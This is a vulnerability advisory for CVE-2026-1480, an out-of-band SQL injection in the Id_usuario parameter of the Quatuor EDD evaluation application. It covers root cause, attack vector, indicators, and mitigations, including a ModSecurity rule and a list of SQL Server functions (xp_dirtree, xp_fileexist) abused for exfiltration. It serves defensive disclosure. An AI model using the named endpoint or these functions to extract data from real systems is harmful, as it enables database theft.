CVE-2026-1480: Quatuor Evaluacion SQLi Vulnerability

CVE-2026-1480 Overview

CVE-2026-1480 is an out-of-band SQL injection (OOB SQLi) vulnerability in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación (Quatuor). The flaw resides in the Id_usuario parameter of the /evaluacion_objetivos_anyo_sig_evalua.aspx endpoint. Unauthenticated attackers can inject SQL payloads that exfiltrate data through external channels such as DNS or HTTP callbacks, bypassing the need for direct response visibility. The Spanish national CERT (INCIBE) published the security advisory tracking this issue.

Critical Impact
Remote, unauthenticated attackers can exfiltrate sensitive database contents from the EDD application over out-of-band channels, compromising the confidentiality of stored evaluation data.

Affected Products

Quatuor Evaluacion de Desempeno (EDD)
Performance Evaluation application by Gabinete Técnico de Programación
Endpoint: /evaluacion_objetivos_anyo_sig_evalua.aspx

Discovery Timeline

2026-01-27 - CVE-2026-1480 published to NVD
2026-02-10 - Last updated in NVD database

Technical Details for CVE-2026-1480

Vulnerability Analysis

The vulnerability is classified under [CWE-89] Improper Neutralization of Special Elements used in an SQL Command. The Id_usuario request parameter is concatenated into a SQL statement without proper parameterization or input validation. Because the application does not return query results directly to the attacker, traditional in-band SQL injection techniques are not viable here. Instead, attackers leverage out-of-band techniques to force the database server to initiate external network requests carrying extracted data.

OOB SQLi is particularly effective against hardened applications that suppress error messages and result rendering. The attack vector is network-based, requires no authentication, and demands no user interaction, which explains the high severity rating.

Root Cause

The root cause is the construction of dynamic SQL queries using untrusted input from the Id_usuario parameter. The application fails to enforce strict type checking or use parameterized queries (prepared statements). Any string supplied in this parameter becomes part of the executed SQL command, enabling attacker-controlled query manipulation.

Attack Vector

An attacker sends a crafted HTTP request to /evaluacion_objetivos_anyo_sig_evalua.aspx with a malicious payload in Id_usuario. The payload typically invokes database functions that perform DNS lookups or HTTP requests to attacker-controlled infrastructure. Sensitive query results are appended to subdomains or URL paths, allowing extraction through DNS logs or HTTP server logs controlled by the attacker. Refer to the INCIBE Security Notice: SQL Injection for additional technical context.

Detection Methods for CVE-2026-1480

Indicators of Compromise

Unusual outbound DNS queries from the database server to unrecognized external domains, often containing encoded or hex-like subdomain strings
HTTP requests to /evaluacion_objetivos_anyo_sig_evalua.aspx containing SQL syntax, single quotes, or function calls in the Id_usuario parameter
Database process activity initiating network connections outside expected application traffic patterns

Detection Strategies

Inspect web server access logs for anomalous values, encoded payloads, or SQL keywords in the Id_usuario parameter
Deploy a web application firewall (WAF) with rules tuned to detect SQL injection signatures targeting ASP.NET endpoints
Monitor database server egress traffic, since legitimate database engines rarely initiate outbound DNS or HTTP connections

Monitoring Recommendations

Enable SQL Server audit logging for stored procedure calls and xp_dirtree, xp_fileexist, or similar functions abused for OOB exfiltration
Correlate web request logs with DNS query telemetry to identify exfiltration patterns
Alert on any request to the affected endpoint that contains URL-encoded SQL metacharacters

How to Mitigate CVE-2026-1480

Immediate Actions Required

Contact Quatuor / Gabinete Técnico de Programación to confirm patch availability for the EDD application
Restrict network access to the /evaluacion_objetivos_anyo_sig_evalua.aspx endpoint to trusted internal users while remediation is pending
Block outbound DNS and HTTP traffic from the database server to the internet at the perimeter firewall
Review database audit logs for evidence of prior exploitation attempts

Patch Information

At the time of publication, no vendor patch URL is listed in the NVD record. Organizations should consult the INCIBE Security Notice: SQL Injection and contact the vendor directly for remediation guidance.

Workarounds

Deploy a WAF rule that rejects requests where Id_usuario contains non-numeric characters or SQL metacharacters
Apply egress filtering on database servers to block unsolicited outbound DNS and HTTP traffic, which neutralizes OOB exfiltration
Implement application-layer input validation that enforces strict type and length constraints on the Id_usuario parameter
Refactor affected queries to use parameterized statements once vendor permits or source access is available

bash

# Example WAF rule (ModSecurity) blocking SQL metacharacters in Id_usuario
SecRule ARGS:Id_usuario "!@rx ^[0-9]{1,10}$" \
    "id:1026148,phase:2,deny,status:403,\
    msg:'CVE-2026-1480 - Invalid Id_usuario parameter',\
    logdata:'Matched value: %{MATCHED_VAR}'"